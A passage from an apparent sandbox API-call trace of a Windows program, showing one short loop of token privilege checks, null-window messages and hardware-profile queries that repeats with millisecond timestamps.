TokenHandle=0x18fe80*=0x114) returned 1 [0085.090] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.090] SetLastError (dwErrCode=0x522) [0085.090] CloseHandle (hObject=0x114) returned 1 [0085.090] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.090] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.090] GetLastError () returned 0x578 [0085.090] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.090] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.090] GetCurrentThread () returned 0xfffffffe [0085.090] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.090] GetLastError () returned 0x3f0 [0085.090] GetCurrentProcess () returned 0xffffffff [0085.090] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.090] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.090] SetLastError (dwErrCode=0x522) [0085.090] CloseHandle (hObject=0x114) returned 1 [0085.091] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.091] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.091] GetLastError () returned 0x578 [0085.091] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.091] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.091] GetCurrentThread () returned 0xfffffffe [0085.091] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.091] GetLastError () returned 0x3f0 [0085.091] GetCurrentProcess () returned 0xffffffff [0085.091] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.091] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.091] SetLastError (dwErrCode=0x522) [0085.091] CloseHandle (hObject=0x114) returned 1 [0085.091] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.091] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.091] GetLastError () returned 0x578 [0085.091] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.091] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.091] GetCurrentThread () returned 0xfffffffe [0085.091] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.091] GetLastError () returned 0x3f0 [0085.091] GetCurrentProcess () returned 0xffffffff [0085.091] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.091] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.091] SetLastError (dwErrCode=0x522) [0085.091] CloseHandle (hObject=0x114) returned 1 [0085.091] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.091] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.091] GetLastError () returned 0x578 [0085.091] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.091] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.091] GetCurrentThread () returned 0xfffffffe [0085.091] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.091] GetLastError () returned 0x3f0 [0085.091] GetCurrentProcess () returned 0xffffffff [0085.091] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.092] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.092] SetLastError (dwErrCode=0x522) [0085.092] CloseHandle (hObject=0x114) returned 1 [0085.092] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.092] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.092] GetLastError () returned 0x578 [0085.092] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.092] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.092] GetCurrentThread () returned 0xfffffffe [0085.092] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.092] GetLastError () returned 0x3f0 [0085.092] GetCurrentProcess () returned 0xffffffff [0085.092] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.092] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.092] SetLastError (dwErrCode=0x522) [0085.092] CloseHandle (hObject=0x114) returned 1 [0085.092] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.092] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.092] GetLastError () returned 0x578 [0085.092] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.092] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.092] GetCurrentThread () returned 0xfffffffe [0085.092] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.092] GetLastError () returned 0x3f0 [0085.092] GetCurrentProcess () returned 0xffffffff [0085.092] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.092] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.092] SetLastError (dwErrCode=0x522) [0085.092] CloseHandle (hObject=0x114) returned 1 [0085.092] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.092] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.092] GetLastError () returned 0x578 [0085.092] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.092] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.092] GetCurrentThread () returned 0xfffffffe [0085.092] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.093] GetLastError () returned 0x3f0 [0085.093] GetCurrentProcess () returned 0xffffffff [0085.093] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.093] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.093] SetLastError (dwErrCode=0x522) [0085.093] CloseHandle (hObject=0x114) returned 1 [0085.093] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.093] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.093] GetLastError () returned 0x578 [0085.093] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.093] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.093] GetCurrentThread () returned 0xfffffffe [0085.093] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.093] GetLastError () returned 0x3f0 [0085.093] GetCurrentProcess () returned 0xffffffff [0085.093] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.093] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.093] SetLastError (dwErrCode=0x522) [0085.093] CloseHandle (hObject=0x114) returned 1 [0085.093] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.093] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.093] GetLastError () returned 0x578 [0085.093] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.093] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.093] GetCurrentThread () returned 0xfffffffe [0085.093] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.093] GetLastError () returned 0x3f0 [0085.093] GetCurrentProcess () returned 0xffffffff [0085.093] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.093] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.093] SetLastError (dwErrCode=0x522) [0085.093] CloseHandle (hObject=0x114) returned 1 [0085.093] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.093] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.093] GetLastError () returned 0x578 [0085.093] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.094] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.094] GetCurrentThread () returned 0xfffffffe [0085.094] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.094] GetLastError () returned 0x3f0 [0085.094] GetCurrentProcess () returned 0xffffffff [0085.094] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.094] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.094] SetLastError (dwErrCode=0x522) [0085.094] CloseHandle (hObject=0x114) returned 1 [0085.094] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.094] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.094] GetLastError () returned 0x578 [0085.094] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.094] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.094] GetCurrentThread () returned 0xfffffffe [0085.094] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.094] GetLastError () returned 0x3f0 [0085.094] GetCurrentProcess () returned 0xffffffff [0085.094] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.094] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.094] SetLastError (dwErrCode=0x522) [0085.094] CloseHandle (hObject=0x114) returned 1 [0085.094] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.094] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.094] GetLastError () returned 0x578 [0085.094] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.094] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.094] GetCurrentThread () returned 0xfffffffe [0085.094] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.094] GetLastError () returned 0x3f0 [0085.094] GetCurrentProcess () returned 0xffffffff [0085.094] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.094] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.095] SetLastError (dwErrCode=0x522) [0085.095] CloseHandle (hObject=0x114) returned 1 [0085.095] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.095] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.095] GetLastError () returned 0x578 [0085.095] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.095] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.095] GetCurrentThread () returned 0xfffffffe [0085.095] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.095] GetLastError () returned 0x3f0 [0085.095] GetCurrentProcess () returned 0xffffffff [0085.095] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.095] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.095] SetLastError (dwErrCode=0x522) [0085.095] CloseHandle (hObject=0x114) returned 1 [0085.095] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.095] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.095] GetLastError () returned 0x578 [0085.095] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.095] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.095] GetCurrentThread () returned 0xfffffffe [0085.095] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.095] GetLastError () returned 0x3f0 [0085.095] GetCurrentProcess () returned 0xffffffff [0085.095] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.095] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.095] SetLastError (dwErrCode=0x522) [0085.095] CloseHandle (hObject=0x114) returned 1 [0085.096] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.096] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.096] GetLastError () returned 0x578 [0085.096] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.096] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.096] GetCurrentThread () returned 0xfffffffe [0085.096] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.096] GetLastError () returned 0x3f0 [0085.096] GetCurrentProcess () returned 0xffffffff [0085.096] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.096] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.096] SetLastError (dwErrCode=0x522) [0085.096] CloseHandle (hObject=0x114) returned 1 [0085.096] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.096] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.096] GetLastError () returned 0x578 [0085.096] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.096] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.096] GetCurrentThread () returned 0xfffffffe [0085.096] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.096] GetLastError () returned 0x3f0 [0085.096] GetCurrentProcess () returned 0xffffffff [0085.096] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.096] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.096] SetLastError (dwErrCode=0x522) [0085.096] CloseHandle (hObject=0x114) returned 1 [0085.096] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.096] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.096] GetLastError () returned 0x578 [0085.096] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.096] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.096] GetCurrentThread () returned 0xfffffffe [0085.096] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.096] GetLastError () returned 0x3f0 [0085.096] GetCurrentProcess () returned 0xffffffff [0085.096] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.097] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.097] SetLastError (dwErrCode=0x522) [0085.097] CloseHandle (hObject=0x114) returned 1 [0085.097] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.097] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.097] GetLastError () returned 0x578 [0085.097] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.097] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.097] GetCurrentThread () returned 0xfffffffe [0085.097] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.097] GetLastError () returned 0x3f0 [0085.097] GetCurrentProcess () returned 0xffffffff [0085.097] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.097] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.097] SetLastError (dwErrCode=0x522) [0085.097] CloseHandle (hObject=0x114) returned 1 [0085.097] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.097] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.097] GetLastError () returned 0x578 [0085.097] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.097] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.097] GetCurrentThread () returned 0xfffffffe [0085.097] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.097] GetLastError () returned 0x3f0 [0085.097] GetCurrentProcess () returned 0xffffffff [0085.097] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.097] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.097] SetLastError (dwErrCode=0x522) [0085.097] CloseHandle (hObject=0x114) returned 1 [0085.097] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.097] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.097] GetLastError () returned 0x578 [0085.097] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.097] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.097] GetCurrentThread () returned 0xfffffffe [0085.097] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.098] GetLastError () returned 0x3f0 [0085.098] GetCurrentProcess () returned 0xffffffff [0085.098] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.098] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.098] SetLastError (dwErrCode=0x522) [0085.098] CloseHandle (hObject=0x114) returned 1 [0085.098] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.098] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.098] GetLastError () returned 0x578 [0085.098] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.098] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.098] GetCurrentThread () returned 0xfffffffe [0085.098] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.098] GetLastError () returned 0x3f0 [0085.098] GetCurrentProcess () returned 0xffffffff [0085.098] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.098] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.098] SetLastError (dwErrCode=0x522) [0085.098] CloseHandle (hObject=0x114) returned 1 [0085.098] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.098] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.098] GetLastError () returned 0x578 [0085.098] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.098] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.098] GetCurrentThread () returned 0xfffffffe [0085.098] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.098] GetLastError () returned 0x3f0 [0085.098] GetCurrentProcess () returned 0xffffffff [0085.098] OpenProcessToken (in: ProcessHandle=0xffffffff, 